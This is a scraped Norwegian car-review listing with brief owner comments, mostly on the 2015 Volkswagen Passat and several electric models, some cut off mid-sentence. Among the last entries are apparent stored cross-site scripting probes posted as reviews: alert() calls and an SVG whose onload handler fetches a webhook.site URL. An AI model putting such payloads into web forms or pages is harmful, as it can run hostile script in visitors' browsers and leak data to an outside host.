Vurdert av Lars
Volkswagen Passat (2015)
Grei bil, men kostnadene kommer fort etter 8-9år. Stort verdifall fra 2023-2024 :-(
Volkswagen Passat (2015)
Blir nok aldri vw igjen.
Volkswagen Passat (2015)
Godt fornøyd med bilen og ikke noe vondt å trekke frem. Ikke noe premium kvalitet på interiør, men fin familie og bruksbil uten at den koster alt for mye
Volkswagen Passat (2015)
Behagelig bil. Virker god sammenskrudd og det har vært relativt lite feil. Har hatt VW i mange år, og denne føyer seg inn i rekken av fine biler som gir en bra totaløkonomi i bilholdet.
Volkswagen Passat (2015)
Kjører den siste modellen fra 2015 herlig langtursbil,ingen feil på 100000 km. Her er det ingenting å sette fingern på utenom Møller s elendige service.
Volkswagen Passat (2015)
Fantastisk kjøremaskin. Mye bil for pengene. Passat her med B8 skapet løftet interiøret til mer premium følelse. Dashbordet har mykt materialer. Ingen plastfølelse som på tidligere modeller. De
Volkswagen Passat (2015)
Alt i alt. Kjempe fornøyd
Volkswagen Passat (2015)
Bilen er ok å kjøre, men masse problemer, og møller nekter å ta dette på garanti! Styr unna!
Volkswagen Passat (2015)
Bra og kjapp. God veiholdning
Volkswagen Passat (2015)
Meget bra familiebil med en bra finish og meget god opplevd kvalitet. Mye utstyr for pengene.
Volkswagen Passat (2015)
Jeg er meget fornøyd med min bil. Har ikke hatt annet en fabrikkoppdatering og service. Pluss bra forhandler
Volkswagen Passat (2015)
En bra bil for pengene. Neste gang blir det hybrid, sannsynligvis Volvo. Litt kjedelig design på Volkswagen.
Volkswagen Passat (2015)
Som utgående modell da vi bestile bilen, var dette først og fremst veldig mye praktisk og godt utstyrt bil for pengene, som løser alle fraktebehov for en aktiv familie uten å mukke. Bagasjerommet
Volkswagen Passat (2015)
meget god bil og alt fungerer slik det skal.
Volkswagen Passat (2015)
Meget fornøyd med bilen.
Citroën DS3 (2012)
Billog liten sportsbil. Jeg vil tro at dette må være en veldig gøy førstebil for mange. Den går godt om mann får bensin 156hk utgaven den ser bra ut og den ligger godt på veien.
Volvo XC40 (2024)
Veldig fornøyd med bil, komfort og spesielt støy som er lavere enn de fleste biler i denne klasse/ pris. Ingen problemer med bilen!
Skoda Enyaq (2025)
Brukt som drosje, har per nå 75000km. Veldig stor oppgradering å få batterivarme. Regenerativ bremsing anbefales ikke på vinterføre. Får minus på forbruk da bilen gir meg 270-330km på kaldeste
Volvo EX30 (2025)
Mekanisk fin bil men med et makkverk av software som er full av feil. Se Volvo ex30 forum for tidenes lengste og gjentakende feil rapporter. Volvo ser ikke ut til å være interessert å ordne opp des
Skoda Enyaq (2023)
Syns utseende å bilen er tøff, ellers kan jeg ikke sa hva den skal være bedre på enn sine konkurrenter. Sitte stillingen passer meg dårlig, men fruen liker det. Pluss at den har soltak Elendi
Mazda CX-5 (2013)
Bilens største utfordring med skyactive motor er relatert til partikkelfilter, koksing av inntaksmanifold og tett sumpfilter, som kan lede til havari. Annet er utkobling av turbo på grunn av feil ve
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass